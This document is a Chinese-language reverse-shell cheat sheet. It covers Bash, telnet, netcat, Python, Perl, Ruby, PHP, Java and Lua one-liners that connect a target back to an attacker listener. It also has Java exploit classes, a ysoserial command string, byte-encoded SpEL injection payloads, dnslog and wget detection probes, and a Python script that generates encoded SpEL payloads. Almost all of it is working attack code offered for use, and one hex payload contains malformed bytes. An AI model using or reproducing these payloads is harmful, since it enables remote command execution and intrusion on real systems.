0x01. Bash反弹
攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/[host]/Port 0>&1
/dev/tcp/[host]/Port;cat <&5 | while read line; do $line 2>&5 >&5; done
/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/[host]/Port 0>&1
0x02. telnet反弹
攻击者主机上打开两个终端分别执行监听: nc -lvvp 4444 nc -lvvp 5555
目标主机中执行(监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip):
telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555
0x03. nc(netcat)反弹
Windows 和 Linux 之间
攻击机上执行监听命令 nc -lvvp port 目标主机上执行: nc -e /bin/bash x.x.x.x port
Windows 和 Windows 之间(局域网|桥接|公网)
攻击机上执行反弹
nc -nv IP [Port]
目标及上执行监听命令
nc -lvp [Port] -e cmd
0x04. 常见脚本反弹
1. Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
2. Perl
方法一:
perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
方法二:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3. Ruby
方法一:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
方法二:
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
4. PHP
php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");'
5. Java
Runtime.getRuntime().exec(new String[]{ "cmd", "/c", cmds}); //Windows
Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", cmds}); //Linux
Runtime.getRuntime().exec("/bin/bash -c 'bash -i>& dev/tcp/xx.xx.xx.xx/5555 0>&1'"); //Linux
public class exp { /** * @param args * @throws Exception */ public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"}; Process p = r.exec(cmd); p.waitFor(); } }
import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/[Host]/Port;cat <&5 | while read line; do $line 2>&5 >&5; done"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { } }
结合http服务
public class exp { /** * @param args * @throws Exception */ public exp() { try{ // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/xx.xx.xx.xx/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"}; Process p = r.exec(cmd); p.waitFor(); } catch (Exception e) { e.printStackTrace(); } } }
ysoserial
String cmd = "java.lang.Runtime.getRuntime().exec(new String []{"/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8888;cat <&5 | while read line; do \$line 2>&5 >&5; done"}).waitFor();";
dnslog检测
public class exp{ public exp(){ try{ java.lang.Runtime.getRuntime().exec("ping xxx.dnslog.cn"); } catch(java.io.IOException e){ e.printStackTrace(); } } }
wget检测
import java.io.IOException; public class exp { public exp() { String cmd = "wget http://xx.xx.xx.xx/success"; try{ Runtime.getRuntime().exec(cmd).getInputStream(); } catch (IOException e) { e.printStackTrace(); } } }
spel表达式
${7*7}
${(new java.lang.ProcessBuilder('calc')).start()}
${new java.lang.ProcessBuilder(new java.lang.String(new byte[]{99,97,108,99})).start()}
${new java.lang.String(new byte[]{86,117,108,110,101,114,97,98,108,101})} //Vulnerable
${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x70,0x69,0x6E,0x67,0x20,0x77,0x34,x06B,0x31,0x76,0x73,0x2E,0x64,0x6E,0x73,0x6C,0x6F,0x67,0x2E,0x63,0x6F,0x6D}))} //dnslog检测
${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x69,0x20,0x3e,0x26,0x20,0x2f,0x64,0x65,0x76,0x2f,0x74,0x63,0x70,0x2f,0x39,0x36,0x2e,0x34,0x35,0x31,0x39,0x31,0x2e,0x32,0x32,0x36,0x2f,0x35,0x35,0x35,0x350x20,0x30,0x3e,0x26,0x31}))} //16进制bash反弹shell
T(java.lang.Runtime).getRuntime().exec('calc.exe')
#this.getClass().forName("java.lang.Runtime").getRuntime().exec("calc.exe")
#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")spel 反弹shell生成脚本
#!/usr/bin/env python message = input('Enter message to encode:') poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0]) for ch in message[1:]: poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) poc += ')}' print(poc)
转换器
http://www.jackson-t.ca/runtime-exec-payloads.html
6. Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"